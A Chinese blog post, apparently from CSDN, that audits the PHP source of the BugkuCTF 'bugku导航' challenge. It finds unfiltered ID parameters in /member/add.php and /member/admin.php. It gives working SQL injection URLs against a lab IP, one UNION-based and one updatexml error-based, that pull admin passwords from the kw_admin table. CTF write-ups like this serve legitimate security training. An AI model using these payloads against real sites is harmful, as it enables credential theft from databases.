代码审计:bugkuCTF web进阶 bugku导航两处注入

最新推荐文章于 2021-05-02 11:58:24 发布
最新推荐文章于 2021-05-02 11:58:24 发布
阅读量860 收藏
点赞数 1
分类专栏: 代码审计 文章标签: php mysql 注入 web ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/105256209
版权

代码审计:bugkuCTF web进阶 bugku导航两处注入

bugku导航

bugku导航是bugkuCTF靶场中,web进阶的一道题,存在源码泄露,所以下下来审计一波。

https://ctf.bugku.com/challenges

在这里插入图片描述
下载源码:
(可以看到有个flag-asd.txt文件,如果只是想通关的话,在线访问这个文件即可得到flag值)

http://123.206.87.240:9006/1.zip

在这里插入图片描述
自行搭建,或者用bugku自己的网站也行。
在这里插入图片描述

代码审计

使用seay工具进行初步审计,根据可疑点回溯。
因为目标是拿到密码,所以主要关注sql注入。
后台admin的就不看了,前台疑似存在四处注入。
在这里插入图片描述
头两个是一样的,进入/include/smarty/plugins/function.list.php,关键代码如下:

<?php
function smarty_function_list ($params , &$smarty){
	$category = $params['category'];
		require ("../common/config.php");
	$sql = "SELECT * FROM `".$dbprefix."_sites` WHERE `Category` = ".$category;
	。。。
}
?>

可以看到sql语句的 $category 没有过滤直接使用,而 $category 来自 p a r a m s 数 组 , params 数组, paramsparams 通过传参进来。
全局搜索 smarty_function_list 函数,看一下调用之前有没有过滤操作。
在这里插入图片描述
很可惜,似乎并没有别的文件调用该函数。

/member/add.php 存在注入

那我们看到第三个,进入/member/add.php,关键代码如下:

<?php
require_once 'inc.php';
$user = $_SESSION['userlogin'];

$type = !empty( $_GET['type'] ) ? trim( $_GET['type'] ) : "";
if( $type == "newok" )
{
	。。。
}elseif( $type == "edit" )
{
	$usersites = $db -> select("SELECT * FROM `".$dbprefix."_favorite` WHERE `ID`=".$_GET['id']);
	$templates->assign("ID",$_GET['id']);
	$templates->assign("Name",$usersites[0]['Name']);
	$templates->assign("Link",$usersites[0]['Link']);
	$templates->assign("Order",$usersites[0]['Order']);
	$templates->assign("stype","editok");
	$templates->assign("title","�޸�վ��");
	$templates->display( templates ( 'add.tpl' ) );
}elseif( $type == "editok" )
{
	。。。
} else
{
	。。。
}
?>

可以看到 select 语句的 id 值直接get获取的,没有任何过滤,存在注入。
代码逻辑不难看出,在用户登录的状态下,访问 /member/add.php,在参数 $type 为 edit 值时,可构造 id 参数进行注入操作。

给出exp:

http://123.206.87.240:9006/member/add.php?type=edit&id=1 union select 1,group_concat(Name),group_concat(Password),4,5 from kw_admin

在这里插入图片描述

/member/admin.php 存在注入

最后看第四个注入点, 进入/member/admin.php, 关键代码如下:

<?php
require_once 'inc.php';

$type = !empty( $_GET['type'] ) ? trim( $_GET['type'] ) : "";
if( $type == "del" )
{
	$id = !empty( $_GET['id'] ) ? trim( $_GET['id'] ) : "";
	$db -> query("DELETE FROM `".$dbprefix."_favorite` WHERE `ID`=".$id);
	$templates->assign("msg","ɾ���û��Զ���վ��ɹ���<a href=\"#\" οnclick=\"history.go(-2);\">����</a>");
	$templates->display( templates ( 'msg.tpl' ) );
} else
{
	。。。
}
?>

可以看到 delect 语句的 id 值没有过滤,存在注入。
访问 /member/admin.php,在参数 $type 为 del 值时,可构造 id 参数进行注入操作。

delect 型的注入,所以我们选择报错注入,给出exp:

http://123.206.87.240:9006/member/admin.php?type=del&id=1 or updatexml(1,concat(0x7e,(select group_concat(Password) from kw_admin)),0)

在这里插入图片描述

CNwanku
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku代码审计
nzw1134864657的博客
10-14 189
strcmp比较字符串 strcmp(a1,a2)函数用来比较两个字符串是否相等的, 比较的是对应字符的ascii码,如果相等返回0, 当a1的ascii大于a2的返回小于0,a1的ascii码小于a2的,返回大于0. 但是这个函数是存在漏洞的,我们知道这个函数是用来比较字符串的, 但是当我们传入为数组是,那变成字符串和数组进行比较了, 因此php在5.2之前,默认返回的-1,5.2版本之后返回0...
bugku代码审计
极光时流
10-28 421
bugku代码审计extract变量覆盖strcmp比较字符串 extract变量覆盖 extract — 从数组中将变量导入到当前的符号表 int extract ( array &amp;amp;$array [, int $flags = EXTR_OVERWRITE [, string $prefix = NULL ]] ) 本函数用来将变量从数组中导入到当前的符号表中。 检查每个键名看是否可以作...
代码审计----bugku
小白的劝退之路
05-12 299
1.extract变量覆盖 <? php$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } }?> Ex...
bugku 代码审计(1)
qq_35811830的博客
05-24 260
PHP中的include(),require()语句包含并运行指定文件 这两个语句在包含文件上完全一样,唯一的区别是对于错误的处理,require()语句在遇到包含文件不存在,或是出错的时候,就立即停止并报错,include()则继续运行 isset()函数用于检测变量是否已设置并且非null 如果已经使用unset()释放一个变量之后,在通过isset()判断将返回false 如果使用isset...
bugkuctf解题-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
代码审计-企业级Web代码安全架构-247页.zip
10-08
代码审计-企业级Web代码安全架构》是一本详尽阐述企业级Web应用程序代码安全的指导书籍,共计247页。这本书旨在帮助开发者、安全工程师以及IT专业人员理解和实施有效的代码审计策略,以保障Web应用程序的安全性。...
代码审计 企业级Web代码安全架构_代码审计_WEB安全_网络安全_渗透测试_
10-03
代码审计:企业级Web代码安全架构详细介绍代码审计的设计思路以及所需要的工具和方法,不仅用大量案例介绍了实用方法,而且剖析了各种代码安全问题的成因与预防方案。无论是应用开发人员还是安全技术人员都能从本书...
bugku web进阶。。buuctf web
gudugeji的博客
01-17 449
1 phpcmsv9 御剑扫描,访问.txt的网址,发现flag 2
Bugku 代码审计 wp
天跃
08-13 542
小白的总结,如有写错还请大佬们多指点,谢谢了! 代码审计: 1.extract变量覆盖 &lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { ec...
BugkuCTF-web进阶-实战2-注入 writeup
会下雪的晴天
07-14 1464
题目描述 解题传送门:http://www.kabelindo.co.id/ 解题思路 打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始 注入嘛,老套路,两种方法 法一、手工注入 猜字段http://www.kabelindo.co....
Bugku CTF 代码审计 writeup(未完待续)
KRDecad3的博客
05-21 1906
Bugku CTF 代码审计 writeup(未完待续) 0x01extract变量覆盖 extract()函数功能:从数组中将变量导入到当前的符号表。使用数组键名作为变量名,使用数组键值作为变量值。 extract(array,extract_rules,prefix) 题中给出extract($_GET),相当于: $shiyan = $_GET[‘shiyan’] $flag...
Bugku bugku导航 writeup
n1109964492的博客
03-21 737
第一次写文章,如果有什么问题欢迎大家指出 打开上面的链接显示这样 第一步,我们先用扫描器扫描该网站有没有什么敏感文件或资源 我们发现扫出了1个admin、1.zip、robots.txt等等敏感文件目录 然后我们访问1.zip把该文件下载过来,然后下载解压后发现这个是该网站的源代码 这个时候,我们在看一下上面的题目提示,flag在根目录,是的,我们发现了这个东西 在本地打开该文件是没有任何...
BugkuCTF代码审计 writeup
Senimo
08-02 653
BugkuCTF代码审计 writeupextract变量覆盖strcmp比较字符串urldecode二次编码绕过md5()函数数组返回NULL绕过弱类型整数大小比较绕过sha()函数比较绕过md5加密相等绕过十六进制与数字比较变量覆盖ereg正则%00截断strpos数组绕过数字验证正则绕过简单的waf BugkuCTF链接 extract变量覆盖 strcmp比较字符串 urldecode二...
bugku 代码审计 write up
0verWatch的博客
02-17 2543
extract变量覆盖 查一下php手册 本函数用来将变量从数组中导入到当前的符号表中。 返回成功导入到符号表中的变量数目。 而且这个函数没还有任何参数,很危险,直接可以修改冲突的变量 关键的代码 构建的payload: ?shiyan=&amp;flag= 因为不知道flag里面什么内容,让它变成空,然后使content变成空,然后&nbsp;content变成空,然...
BugKuCTF_WEB题解报告
whatacutepanda的博客
03-19 5738
在学习CTF中,写点东西记录自己的学习,也算是一个反思吧。http://ctf.bugku.com/challenges                                                   web2:这个只用简单的按F12就能看到文件上传测试:我们首先随便传入一个PHP文件尝试一下发现提示说非图片文件那么我们再尝试传入一个图片然后我们思考一下题目要求说上传一个PHP...
ctf.bugku.com web_WriteUp
qq_53525138的博客
05-02 207
ctf.bugku.com web_WriteUp web1 F12解决 web2 F12,修改html表单限制。 web3 增加get请求参数 web4 在火狐浏览器hackbar插件中输入打开网页,使用POST请求方式 web5 增加get请求参数,注意url最后的/ web6 火狐浏览器查看源代码,在注释中有一段数字,使用Unicode解码 web11 使用御剑扫描后台,发现shell.php 使用bp暴力爆破。 。 ...
WEB代码审计:发现与防御的关键策略
WEB代码审计是一门深入理解并检测Web应用程序中潜在安全风险的技术。本书详细介绍了如何对PHP应用程序进行审计,因为PHP由于其跨平台性、广泛应用、灵活的变量处理以及庞大的函数库,成为审计的重点对象。在PHP中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值